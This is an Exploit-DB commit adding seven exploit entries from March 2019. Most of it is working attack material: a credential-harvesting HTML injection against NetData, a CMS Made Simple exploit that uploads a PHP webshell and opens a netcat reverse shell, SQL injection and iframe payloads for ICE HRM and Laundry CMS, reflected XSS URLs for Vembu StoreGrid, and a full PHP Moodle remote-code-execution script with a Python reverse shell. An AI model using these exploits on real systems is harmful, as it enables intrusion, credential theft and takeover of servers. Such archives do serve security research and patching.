DB: 2019-03-16

7 changes to exploits/shellcodes

Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow
NetData 1.13.0 - HTML Injection
CMS Made Simple Showtime2 Module 3.6.2 - Authenticated Arbitrary File Upload
ICE HRM 23.0 - Multiple Vulnerabilities
Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities
Laundry CMS - Multiple Vulnerabilities
Moodle 3.4.1 - Remote Code Execution
This commit is contained in:
Offensive Security 2019-03-16 05:01:58 +00:00
parent b4e61d43c1
commit 790034e7df
8 changed files with 971 additions and 0 deletions

View file

@ -0,0 +1,49 @@
# ************************************************************************
# * Author: Marcelo Vázquez (aka s4vitar) *
# * NetData v1.13.0 HTML Injection Vulnerability *
# ************************************************************************
# Exploit Title: NetData v1.13.0 HTML Injection Vulnerability
# Date: 2019-03-14
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Collaborators: Victor Lasa (aka vowkin)
# Vendor Homepage: https://my-netdata.io/
# Software Link: https://docs.netdata.cloud/packaging/installer/
# Version: <= NetData v1.13.0
# PoC Video (Credential Harvesting): https://www.youtube.com/watch?v=zSG93yX0B8k
NetData is prone to multiple HTML-injection vulnerabilities.
Successful exploitation will allow attacker-supplied HTML to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
NetData 1.13.0 is vulnerable; other versions may also be affected.
Proof of Concept:
=====================
1. Export a valid snapshot using the "export/save a netdata snapshot" function from the NetData dashboard (top right on the navigation bar).
2. Once it has finished exporting, attackers can manipulate the contents of said snapshot file and inject their own malicious HTML code. An example is provided below:
<div style='position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;'>Please login with valid credentials:<br></br><br>Please enter your credentials to see the content:</br><br><form name='login' action='http://attackerIP:port/'><table><tr><td>Username:</td><td><input type='text' name='username'/></td></tr><tr><td>Password:</td><td><input type='text' name='password'/></td></tr><tr><td colspan=2 align=center><input type='submit' value='Login'/></td></tr></table></form></div>
In this case, the attackers perform a credential theft attack where they specify the public IP and port from their own server, which is listening for new connections in order to receive the stolen credentials in plain text.
3. Import the newly modified snapshot using the "import/load a netdata snapshot" function from the NetData dashboard (top right on the navigation bar).
4. Once imported, the victim will see a login form that asks for their credentials.
5. After they are entered, the attacker can visualize said credentials in plain text on his own server, as they are sent through a simple GET request:
root@vps-server:~# nc -nlvp 4646
Listening on [0.0.0.0] (family 0, port 4646)
Connection from [XX.X.XXX.X] port 4646 [tcp/*] accepted (family 2, sport 36930)
GET /?username=test&password=passwordexample HTTP/1.1
Host: XXX.XXX.XX.XX:4646
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:19999/
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9,en;q=0.8

75
exploits/php/webapps/46546.py Executable file
View file

@ -0,0 +1,75 @@
#!/usr/bin/env python
# Exploit Title: CMS Made Simple (authenticated) arbitrary file upload in Showtime2 module
# Date: March 2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtime2
# Version: Showtime2 module <= 3.6.2
# Tested on: CMS Made Simple 2.2.8 in Ubuntu 18.04
# CVE : 2019-9692
import requests
import optparse
from requests_toolbelt.multipart.encoder import MultipartEncoder
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://192.168.1.10/cms)")
parser.add_option('-U', '--username', action="store", dest="username", help="Username for login", default="admin")
parser.add_option('-P', '--password', action="store", dest="password", help="Password for login", default="password")
parser.add_option('-l', '--local', action="store", dest="local", help="Local uri for reverse shell", default="localhost")
parser.add_option('-p', '--port', action="store", dest="port", help="Local port for reverse shell", default="2222")
options, args = parser.parse_args()
if not options.url:
print "[-] Specify an uri target"
exit()
if not options.username:
print "[-] Specify an username for login in administrator panel"
exit()
if not options.password:
print "[-] Specify a password for login in administrator panel"
exit()
base_uri = options.url
url_login = base_uri + "/admin/login.php"
user = options.username
password = options.password
session = requests.Session()
__c_var = ""
lhost = options.local
lport = options.port
# Login in administrator panel for get the csrf token
def login(username, password):
print "[*] Login to cms"
global __c_var
credentials = {"username": username, "password": password, "loginsubmit": "Submit"}
response = session.post(url_login, data=credentials, allow_redirects=False)
__c_var = response.headers['Location'].split("__c=")[1]
print "[*] Token value: " + __c_var
# upload a php script with reverse shell in vulnerable functionality
def upload_shell():
print "[*] Uploading webshell"
multipart_data = MultipartEncoder(
fields = {
'm1_input_browse': ('shell.php', "<?php system($_REQUEST['cmd']); ?>", 'text/plain'),
'__c': __c_var,
'mact': 'Showtime2,m1_,defaultadmin,0',
'm1_upload_submit': 'Upload'
}
)
response = session.post(base_uri + '/admin/moduleinterface.php', data=multipart_data,
headers={'Content-Type': multipart_data.content_type})
# Call the script uploaded for spawn a reverse shell
def spawn_shell():
print "[*] Spawn a shell to " + lhost + ":" + str(lport)
payload = {"cmd": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + lhost + " " + str(lport) + " >/tmp/f"}
requests.post(base_uri + "/uploads/images/shell.php", data=payload)
login(user, password)
upload_shell()
spawn_shell()

View file

@ -0,0 +1,69 @@
===========================================================================================
# Exploit Title: ICE HRM - ob SQL Inj.
# Dork: N/A
# Date: 14-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://icehrm.org
# Software Link: https://sourceforge.net/projects/icehrm/
# Version: v23.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: ICE Hrm is a Human resource management system for
small and medium sized organizations.
It has a rich UI built with PHP and Java Script.
===========================================================================================
# POC - SQLi (blind)
# Parameters : ob
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
# POST Method : http://localhost/icehrmv23OS/app/service.php
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: ICE HRM - ob SQL Inj.
# Dork: N/A
# Date: 14-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://icehrm.org
# Software Link: https://sourceforge.net/projects/icehrm/
# Version: v23.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: ICE Hrm is a Human resource management system for
small and medium sized organizations.
It has a rich UI built with PHP and Java Script.
===========================================================================================
# POC - SQLi (blind)
# Parameters : ob
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
# GET Method :
http://localhost/icehrmv23OS/app/data.php?t=Employee&sm=%7B%22nationality%22:[%22Nationality%22,%22id%22,%22name%22],%22ethnicity%22:[%22Ethnicity%22,%22id%22,%22name%22],%22immigration_status%22:[%22ImmigrationStatus%22,%22id%22,%22name%22],%22employment_status%22:[%22EmploymentStatus%22,%22id%22,%22name%22],%22job_title%22:[%22JobTitle%22,%22id%22,%22name%22],%22pay_grade%22:[%22PayGrade%22,%22id%22,%22name%22],%22country%22:[%22Country%22,%22code%22,%22name%22],%22province%22:[%22Province%22,%22id%22,%22name%22],%22department%22:[%22CompanyStructure%22,%22id%22,%22title%22],%22supervisor%22:[%22Employee%22,%22id%22,%22first_name%20last_name%22]%7D&cl=[%22id%22,%22image%22,%22employee_id%22,%22first_name%22,%22last_name%22,%22mobile_phone%22,%22department%22,%22gender%22,%22supervisor%22]&ft=%7B%22status%22:%22Active%22%7D&ob=1%20%2b%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))%2f*%27XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%27%7c%22XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%22*%2f
===========================================================================================
===========================================================================================
# Exploit Title: ICE HRM - msg Frame Inj.
# Dork: N/A
# Date: 14-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://icehrm.org
# Software Link: https://sourceforge.net/projects/icehrm/
# Version: v23.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: ICE Hrm is a Human resource management system for
small and medium sized organizations.
It has a rich UI built with PHP and Java Script.
===========================================================================================
# POC - Frame Inj.
# Parameters : msg
# Attack Pattern : %3ciframe+src%3d%22http%3a%2f%2fcyber-warrior.org
%2f%3f%22%3e%3c%2fiframe%3e
# GET Method :
http://localhost/icehrmv23OS/app/fileupload_page.php?id=_id_&msg=<iframe
src="http://cyber-warrior.org/
?"></iframe>&file_group=_file_group_&file_type=_file_type_&user=_user_
===========================================================================================

View file

@ -0,0 +1,22 @@
# Exploit Title: Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities
# Discovery Date: 2018-12-05
# Exploit Author: Gionathan "John" Reale
# Vendor Homepage: https://www.vembu.com/
# Software Link : N/A
# Google Dork: N/A
# Version: 4.4.0
# CVE : CVE-2014-10078,CVE-2014-10079
Description StoreGrid enables you to offer an automated online backup service to your customers and is designed to be flexible to your needs. Upon investigating the web interface I discovered multiple vulnerabilities.
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
Information Disclosure. The front page of the server web interface leaks the private IP address in the hidden form "ipaddress" around line 80.
==========================================================================================================================
Reflected XSS. The server web interface contains multiple reflected XSS exploits that do not require authentication.
https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result=
https://xxxxxxxx.xx:6061//interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result=
https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result=
https://xxxxxxxxx.xx:6061/interface/registerreseller/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font>
https://xxxxxxxxx.xx:6061/interface/registerclient/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font>
https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font>
=============================================================================================================================
Self XSS. The server web interface contains a self XSS in the search function.
==============================================================================================================================

View file

@ -0,0 +1,126 @@
===========================================================================================
# Exploit Title: Laundry CMS cloth_code SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : cloth_code, cloth_name
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/cloth_crud/create
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS Multiple SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : last_name, password, email, phone, first_name, status,
join_date, address,
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/customer_crud/create
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS Multiple SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : last_name, password, email, phone, first_name, status,
join_date, address, gender
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/employee_crud/new
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS expse_code SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : expse_code, expse_type, expse_id
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/expenses_crud/create
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS service_code SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : service_code, service_name
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/service_crud/create
===========================================================================================
===========================================================================================
# Exploit Title: Laundry CMS Multiple Frame Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very simple and Online Services
with mobile and computer friendly themes development.
===========================================================================================
# POC - Frame Inj.
# Parameters : cloth_name, service_name, expse_type
# Attack Pattern : %3ciframe+src%3d%22http%3a%2f%2fcyber-warrior.org%2f%3f%22%3e%3c%2fiframe%3e
# POST Method : http://localhost/laundry/index.php/admin/service_crud/create
===========================================================================================

View file

@ -0,0 +1,512 @@
<?php
/**
* Exploit Title: Moodle v3.4.1 RCE Exploit
* Google Dork: inurl:"/course/jumpto.php?jump="
* Date: 15 March 2019
* Exploit Author: Darryn Ten
* Vendor Homepage: https://moodle.org
* Software Link: https://github.com/moodle/moodle/archive/v3.4.1.zip
* Version: 3.4.1 (Possibly < 3.5.0 and maybe even 3.x)
* Tested on: Linux with Moodle v3.4.1
* CVE : CVE-2018-1133
*
* This exploit is based on information provided by Robin Peraglie.
* Additional Reading: https://blog.ripstech.com/2018/moodle-remote-code-execution
*
* A user with the teacher role is able to execute arbitrary code.
*
* Usage:
*
* > php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1
*
* user The account username
* pass The password to the account
* ip Callback IP
* port Callback Port
* course Valid course ID belonging to the teacher
*
* Make sure you're running a netcat listener on the specified port before
* executing this script.
*
* > nc -lnvp 1010
*
* This will attempt to open up a reverse shell to the listening IP and port.
*
* You can start the script with `debug=true` to enable debug mode.
*/
namespace exploit {
class moodle {
public $ip;
public $port;
public $courseId;
public $cookie_jar;
public $url;
public $pass;
public $payload;
public $quizId = false;
public $moodleSession = false;
public $moodleKey;
// Verification patterns
public $loginSuccessMatch = "/course.view\.php/";
public $courseSuccessMatch = "/.\/i.Edit.settings.\/a./";
public $editSuccessMatch = "/.view.php\?id=2&notifyeditingon=1/";
public $quizSuccessMatch = "/.title.Editing.Quiz.\/title./";
public $quizConfigMatch = "/title.*xxxx.\/title./";
public $evilSuccess = "/The\ wild\ cards\ \<strong\>\{x..\}\<\/strong\>\ will\ be\ substituted/";
public $debug;
public function __construct($url, $user, $pass, $ip, $port, $course, $debug) {
$this->cookie_jar = tempnam("/tmp","cookie");
$this->url = $url;
$this->pass = $pass;
$this->ip = $ip;
$this->port = $port;
$this->courseId = $course;
$this->debug = $debug;
// Inject a reverse shell
// You could modify this payload to inject whatever you like
$this->payload = "(python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect((\"".$this->ip."\",".$this->port."))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call([\"/bin/sh\",\"-i\"])%3b')";
echo("\n\r");
echo("*------------------------------*\n\r");
echo("* Noodle [Moodle RCE] (v3.4.1) *\n\r");
echo("*------------------------------*\n\r");
echo("\n\r");
echo("[!] Make sure you have a listener\n\r");
echo(sprintf("[!] at %s:%s\n\r", $this->ip, $this->port));
echo("\n\r");
$this->login($url, $user, $pass);
$this->loadCourse($this->courseId);
$this->enableEdit();
$this->addQuiz();
$this->editQuiz();
$this->addCalculatedQuestion();
$this->addEvilQuestion();
$this->exploit();
echo "[*] DONE\n\r";
die();
}
function login($url, $user, $pass) {
echo(sprintf("[*] Logging in as user %s with password %s \n\r", $user, $pass));
$data = [
"anchor" => "",
"username" => $user,
"password" => $pass
];
$result = $this->httpPost("/login/index.php", $data);
if (!preg_match($this->loginSuccessMatch, $result["body"])) {
echo "[-] LOGIN FAILED!\n\r";
echo "[?] Do you have the right credentials and url?\n\r";
die();
}
$matches = [];
$cookies = preg_match_all("/MoodleSession=(.*); path=/", $result["header"], $matches);
$this->moodleSession = $matches[1][1];
$matches = [];
$key = preg_match_all("/sesskey\":\"(.*)\",\"themerev/", $result["body"], $matches);
$this->moodleKey = $matches[1][0];
echo "[+] Successful Login\n\r";
echo sprintf("[>] Moodle Session %s \n\r", $this->moodleSession);
echo sprintf("[>] Moodle Key %s \n\r", $this->moodleKey);
}
function loadCourse($id) {
echo(sprintf("[*] Loading Course ID %s \n\r", $id));
$result = $this->httpGet(sprintf("/course/view.php?id=%s", $id), $this->moodleSession);
if (!preg_match($this->courseSuccessMatch, $result["body"])) {
echo "[-] LOADING COURSE FAILED!\n\r";
echo "[?] Does the course exist and belong to the teacher?\n\r";
die();
}
echo "[+] Successfully Loaded Course\n\r";
}
function enableEdit() {
echo(sprintf("[*] Enable Editing\n\r"));
$result = $this->httpGet(sprintf(
"/course/view.php?id=%s&sesskey=%s&edit=on",
$this->courseId,
$this->moodleKey
), $this->moodleSession);
if (!preg_match($this->editSuccessMatch, $result["header"])) {
echo "[-] ENABLE EDITING FAILED!\n\r";
echo "[?] Does the user have the teacher role?\n\r";
die();
}
echo "[+] Successfully Enabled Course Editing\n\r";
}
function addQuiz() {
echo(sprintf("[*] Adding Quiz\n\r"));
$data = [
"course" => $this->courseId,
"sesskey" => $this->moodleKey,
"jump" => urlencode(sprintf(
"/course/mod.php?id=%s&sesskey=%s&str=0&add=quiz&section=0",
$this->courseId,
$this->moodleKey
)),
];
$result = $this->httpPost("/course/jumpto.php", $data, $this->moodleSession);
if (!preg_match($this->quizSuccessMatch, $result["body"])) {
echo "[-] ADD QUIZ FAILED!\n\r";
die();
}
echo "[+] Successfully Added Quiz\n\r";
echo "[*] Configuring New Quiz\n\r";
$submit = [
"grade" => 10,
"boundary_repeats" => 1,
"completionunlocked" => 1,
"course" => $this->courseId,
"coursemodule" => "",
"section" => 0,
"module" => 16,
"modulename" => "quiz",
"instance" => "",
"add" => "quiz",
"update" => 0,
"return" => 0,
"sr" => 0,
"sesskey" => $this->moodleKey,
"_qf__mod_quiz_mod_form" => 1,
"mform_showmore_id_layouthdr" => 0,
"mform_showmore_id_interactionhdr" => 0,
"mform_showmore_id_display" => 0,
"mform_showmore_id_security" => 0,
"mform_isexpanded_id_general" => 1,
"mform_isexpanded_id_timing" => 0,
"mform_isexpanded_id_modstandardgrade" => 0,
"mform_isexpanded_id_layouthdr" => 0,
"mform_isexpanded_id_interactionhdr" => 0,
"mform_isexpanded_id_reviewoptionshdr" => 0,
"mform_isexpanded_id_display" => 0,
"mform_isexpanded_id_security" => 0,
"mform_isexpanded_id_overallfeedbackhdr" => 0,
"mform_isexpanded_id_modstandardelshdr" => 0,
"mform_isexpanded_id_availabilityconditionsheader" => 0,
"mform_isexpanded_id_activitycompletionheader" => 0,
"mform_isexpanded_id_tagshdr" => 0,
"mform_isexpanded_id_competenciessection" => 0,
"name" => "xxxx",
"introeditor[text]" => "<p>xxxx<br></p>",
"introeditor[format]" => 1,
"introeditor[itemid]" => 966459952,
"showdescription" => 0,
"overduehandling" => "autosubmit",
"gradecat" => 1,
"gradepass" => "",
"attempts" => 0,
"grademethod" => 1,
"questionsperpage" => 1,
"navmethod" => "free",
"shuffleanswers" => 1,
"preferredbehaviour" => "deferredfeedback",
"attemptonlast" => 0,
"attemptimmediately" => 1,
"correctnessimmediately" => 1,
"marksimmediately" => 1,
"specificfeedbackimmediately" => 1,
"generalfeedbackimmediately" => 1,
"rightanswerimmediately" => 1,
"overallfeedbackimmediately" => 1,
"attemptopen" => 1,
"correctnessopen" => 1,
"marksopen" => 1,
"specificfeedbackopen" => 1,
"generalfeedbackopen" => 1,
"rightansweropen" => 1,
"overallfeedbackopen" => 1,
"showuserpicture" => 0,
"decimalpoints" => 2,
"questiondecimalpoints" => -1,
"showblocks" => 0,
"quizpassword" => "",
"subnet" => "",
"browsersecurity" => "-",
"feedbacktext[0][text]" => "",
"feedbacktext[0][format]" => 1,
"feedbacktext[0][itemid]" => 754687559,
"feedbackboundaries[0]" => "",
"feedbacktext[1][text]" => "",
"feedbacktext[1][format]" => 1,
"feedbacktext[1][itemid]" => 88204176,
"visible" => 1,
"cmidnumber" => "",
"groupmode" => 0,
"availabilityconditionsjson" => urlencode("{\"op\":\"&\",\"c\":[],\"showc\":[]}"),
"completion" => 1,
"tags" => "_qf__force_multiselect_submission",
"competency_rule" => 0,
"submitbutton" => "Save and display"
];
$result = $this->httpPost("/course/modedit.php", $submit, $this->moodleSession);
if (!preg_match($this->quizConfigMatch, $result["body"])) {
echo "[-] CONFIGURE QUIZ FAILED!\n\r";
die();
}
$matches = [];
$quiz = preg_match_all("/quiz\/view.php.id=(.*)&forceview=1/", $result["header"], $matches);
$this->quizId = $matches[1][0];
echo "[+] Successfully Configured Quiz\n\r";
}
function editQuiz() {
echo(sprintf("[*] Loading Edit Quiz Page \n\r"));
$result = $this->httpGet(sprintf("/mod/quiz/edit.php?cmid=%s", $this->quizId), $this->moodleSession);
if (!preg_match("/.title.Editing quiz: xxxx.\/title/", $result["body"])) {
echo "[-] LOADING EDITING PAGE FAILED!\n\r";
die();
}
echo "[+] Successfully Loaded Edit Quiz Page\n\r";
}
function addCalculatedQuestion() {
echo(sprintf("[*] Adding Calculated Question \n\r"));
$endpoint = "/question/question.php?courseid=".$this->courseId."&sesskey=".$this->moodleKey."&qtype=calculated&returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D".$this->quizId."%26addonpage%3D0&cmid=".$this->quizId."&category=2&addonpage=0&appendqnumstring=addquestion'";
$result = $this->httpGet($endpoint, $this->moodleSession);
if (!preg_match("/title.Editing\ a\ Calculated\ question.\/title/", $result["body"])) {
echo "[-] ADDING CALCULATED QUESTION FAILED!\n\r";
die();
}
echo "[+] Successfully Added Calculation Question\n\r";
}
function addEvilQuestion() {
echo(sprintf("[*] Adding Evil Question \n\r"));
$payload = [
"initialcategory" => 1,
"reload" => 1,
"shuffleanswers" => 1,
"answernumbering" => "abc",
"mform_isexpanded_id_answerhdr" => 1,
"noanswers" => 1,
"nounits" => 1,
"numhints" => 2,
"synchronize" => "",
"wizard" => "datasetdefinitions",
"id" => "",
"inpopup" => 0,
"cmid" => $this->quizId,
"courseid" => 2,
"returnurl" => sprintf("/mod/quiz/edit.php?cmid=%s&addonpage=0", $this->quizId),
"scrollpos" => 0,
"appendqnumstring" => "addquestion",
"qtype" => "calculated",
"makecopy" => 0,
"sesskey" => $this->moodleKey,
"_qf__qtype_calculated_edit_form" => 1,
"mform_isexpanded_id_generalheader" => 1,
"mform_isexpanded_id_unithandling" => 0,
"mform_isexpanded_id_unithdr" => 0,
"mform_isexpanded_id_multitriesheader" => 0,
"mform_isexpanded_id_tagsheader" => 0,
"category" => "2,23",
"name" => "zzzz",
"questiontext[text]" => "<p>zzzz<br></p>",
"questiontext[format]" => 1,
"questiontext[itemid]" => 999787569,
"defaultmark" => 1,
"generalfeedback[text]" => "",
"generalfeedback[format]" => 1,
"generalfeedback[itemid]" => 729029157,
"answer[0]" => ' /*{a*/`$_GET[0]`;//{x}}',
"fraction[0]" => "1.0",
"tolerance[0]" => "0.01",
"tolerancetype[0]" => 1,
"correctanswerlength[0]" => 2,
"correctanswerformat[0]" => 1,
"feedback[0][text]" => "",
"feedback[0][format]" => 1,
"feedback[0][itemid]" => 928615051,
"unitrole" => 3,
"penalty" => "0.3333333",
"hint[0]text]" => "",
"hint[0]format]" => 1,
"hint[0]itemid]" => 236679070,
"hint[1]text]" => "",
"hint[1]format]" => 1,
"hint[1]itemid]" => 272691514,
"tags" => "_qf__force_multiselect_submission",
"submitbutton" => "Save change"
];
$result = $this->httpPost("/question/question.php", $payload, $this->moodleSession);
if (!preg_match($this->evilSuccess, $result["body"])) {
echo "[-] EVIL QUESTION CREATION FAILED!\n\r";
die();
}
echo "[+] Successfully Created Evil Question\n\r";
}
function exploit() {
echo "[*] Sending Exploit\n\r";
echo "\n\r";
if ($this->debug) {
echo "[D] Payload: \n\r";
echo sprintf("[>] %s \n\r", $this->payload);
}
$exploitUrl = sprintf(
"/question/question.php?returnurl=%s&addonpage=0&appendqnumstring=addquestion&scrollpos=0&id=8&wizardnow=datasetitems&cmid=%s&0=(%s)",
urlencode(sprintf(
"/mod/quiz/edit.php?cmid=%s",
$this->quizId)
),
$this->quizId,
$this->payload);
if ($this->debug) {
echo sprintf("[D] Exploit URL: %s \n\r", $exploitUrl);
}
echo sprintf("[>] You should receive a reverse shell attempt from the target at %s on port %s \n\r", $this->ip, $this->port);
echo sprintf("[>] If connection was successful this program will wait here until you close the connection.\n\r");
echo sprintf("[>] You should be able to Ctrl+C and retain the connection through netcat.\n\r");
$this->httpGet($exploitUrl, $this->moodleSession);
}
function httpPost($url, $data, $session = false, $json = false)
{
if ($this->debug) {
echo(sprintf("[D] Doing HTTP POST to URL: %s \n\r", $url));
echo(sprintf("[D] Session: %s \n\r", $session));
echo(sprintf("[D] Data: %s \n\r", json_encode($data)));
echo("\n\r");
}
$curl = curl_init(sprintf("%s%s", $this->url, $url));
$headers = [];
if ($session) {
array_push($headers, sprintf("Cookie: MoodleSession=%s", $session));
}
if ($json) {
array_push($headers, "Content-Type: application/json");
} else {
$data = urldecode(http_build_query($data));
}
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_HEADER, true);
curl_setopt($curl, CURLOPT_COOKIEJAR, $this->cookie_jar);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($curl);
$header_size = curl_getinfo($curl, CURLINFO_HEADER_SIZE);
$header = substr($response, 0, $header_size);
$body = substr($response, $header_size);
if ($this->debug) {
echo "[D] Response Header";
echo sprintf("[>] %s", $header);
echo "";
echo "[D] Response Body";
echo sprintf("[>] %s", $body);
}
return [
"header" => $header,
"body" => $body
];
}
function httpGet($route, $session = false)
{
$url = sprintf("%s%s", $this->url, $route);
if ($this->debug) {
echo(sprintf("[D] Doing HTTP GET to URL: %s \n\r", $url));
echo("\n\r");
}
$headers = [];
if ($session) {
array_push($headers, sprintf("Cookie: MoodleSession=%s", $session));
}
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_HEADER, true);
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_COOKIEJAR, $this->cookie_jar);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($curl);
$header_size = curl_getinfo($curl, CURLINFO_HEADER_SIZE);
$header = substr($response, 0, $header_size);
$body = substr($response, $header_size);
if ($this->debug) {
echo "[D] Response Header";
echo sprintf("[>] %s", $header);
echo "";
echo "[D] Response Body";
echo sprintf("[>] %s", $body);
}
return [
"header" => $header,
"body" => $body
];
}
}
parse_str(implode("&", array_slice($argv, 1)), $_GET);
$url = $_GET["url"];
$user = $_GET["user"];
$pass = $_GET["pass"];
$ip = $_GET["ip"];
$port = $_GET["port"];
$course = $_GET["course"];
$debug = isset($_GET["debug"]) ? true : false;
new \exploit\moodle($url, $user, $pass, $ip, $port, $course, $debug);
}

111
exploits/windows/remote/46547.py Executable file
View file

@ -0,0 +1,111 @@
# Exploit Title: Tabs Mail Carrier 2.5.1 MAIL FROM: Buffer Overflow
# Date: March 14, 2019
# Exploit Author: Joseph McDonagh
# Vendor Homepage: N/A
# Software Link: N/A
# Version: Mail Carrier 2.5.1
# Tested on: Windows Vista Home Basic SP2
# CVE: None
#!/usr/bin/python
#
# This script started from PWK, Chapter 6
# I am re-purposing it Tabs Mail Carrier 2.5.1 OSCE practice
# During testing, I found the MAIL FROM: is also vulnerable to Buffer Overflow
# Thanks to the original authors of the EHLO parameter, gave me the
starting point and nudge I needed
#
# Usage ./tabs_mail.pwn.py 192.168.1.66
# Bind shell on TCP port 19397
